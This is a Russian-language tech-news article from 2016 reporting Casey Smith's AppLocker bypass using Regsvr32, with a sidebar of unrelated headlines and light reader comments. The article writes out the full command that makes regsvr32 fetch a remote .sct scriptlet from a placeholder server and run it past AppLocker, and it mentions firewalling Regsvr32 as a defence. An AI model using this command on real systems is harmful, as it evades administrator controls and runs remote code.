• Хакеры воруют данные с ПК с помощью файла Microsoft Word

    Как сообщают эксперты в области кибербезопасности из компании Trustwave SpiderLabs, злоумышленники нашли новый способ похищения данных с компьютеров пользователей через распространение вируса под видом документа Microsoft Word. Подобное случалось и раньше, во вредоносной программе полностью отсутствуют макросы, что усложняет её обнаружени...
    Читать дальше
  • Энтузиаста, оплачивавшего проезд вживлённым чипом, оштрафовали

    Мяу-Людо Диско Гамма Мяу-Мяу (Meow Ludo Disco Gamma Meow Meow) — австралийский энтузиаст, имплантировавший чип проездного в свою левую руку. В метро Мяу расплачивался за проезд, всего лишь приложив кисть к терминалу, это позволяло ему не носить с собой транспортную карту или доставать смартфон, что экономило время на процедуре оплаты услу...
    Читать дальше
  • Обновление Windows 10 повысит производительность системы

    В официальном блоге Windows появилось сообщение о выходе бета версии ОС Windows 10 сборки 17604. Основным новшеством для пользователей операционной системы Windows 10 Pro будет режим Ultimate Performance for Workstations.
    Читать дальше
  • Рекламные ролики продемонстрировали фотовозможности Galaxy S9 (4 видео)

    Стартовала рекламная кампания новых флагманов от Samsung: Galaxy S9+ и Galaxy S9. Чтобы наглядно продемонстрировать преимущества новинок ещё до их анонса, корпорация сняла тройку небольших промо-сюжетов. 15-секундные видеоролики посвящены ключевым особенностям топовых смартфонов.
    Читать дальше
  • Учёному удалось сфотографировать одиночный атом камерой Canon (4 фото)

    Научный работник, физик Дэвид Надлингер, работающий в Оксфордском университете, провел интересный эксперимент, в результате которого сумел получить фотографию единичного положительно заряженного атома стронцияв ионной ловушке. Снимок стал победителем в ежегодном конкурсе фотографий научно-исследовательского Совета по инженерным и физическ...
    Читать дальше

Безопасность Windows оказалась под угрозой

27 апреля 2016 | Windows
Безопасность Windows оказалась под угрозой

В течение многих лет в бизнес-ориентированных версиях Windows присутствует функция AppLocker, которая позволяет администратору регулировать запуск тех или иных программ на компьютере. Например, можно запретить установку любых программ или запуск уже имеющихся приложений, которые не относятся к работе сотрудника. Это несомненно полезно для компаний, стремящихся защитить свою структуру от потенциально опасного ПО, однако исследователь Кейси Смит (Casey Smith) выяснил, что полностью доверять AppLocker не стоит, поскольку обнаруженная им уязвимость позволяет обходить ограничения администратора с помощью одной строки кода. Таким образом хакерам ничего не стоит взломать компьютеры и запустить вредоносное ПО.

Кейси Смит указал на инструмент Regsvr32, который можно использовать не по назначению для скачивания из интернета определенного XML-файла. Ввод команды вида regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll и скачивание файла, приведет к запуску cmd.exe, который можно заменить на любую другую программу, несмотря на установленные администратором ограничения в AppLocker. Атака не оставляет следов на жестком диске и в реестре, а в арсенале Microsoft пока не существует соответствующей «заплатки» для этой уязвимости. Описание ее Смит опубликовал на сервисе GitHub. Как вариант защиты рекомендуется отрезать Regsvr32 от интернета с помощью файервола.

Источник: engadget.com
Понравился пост? Просоединяйтесь к нам в Facebook!

Написать комментарий


Включите эту картинку для отображения кода безопасности
обновить, если не виден код


Комментарии: 5

avatar
27 апреля 2016 10:17 Hilo
Есть повод разработчикам заняться работой
+ 2
Ответить
avatar
27 апреля 2016 10:58 Гость_Xumepa
С админом можно и договориться об установке необходимого ПО
+ 0
Ответить
avatar
27 апреля 2016 11:30 Гость_M
В россии, за рубежом зарплата сисадминрстраторов достаточно высокая дабы не договорились
+ 0
Ответить
avatar
27 апреля 2016 12:08 WadymOS
Это что ж за админ такой, с которым можно договориться?
+ 0
Ответить
avatar
28 апреля 2016 11:41 zlodeu
Я например! )))
+ 3
Ответить
В Вашем браузере отключен JavaScript. Для корректной работы сайта настоятельно рекомендуется его включить.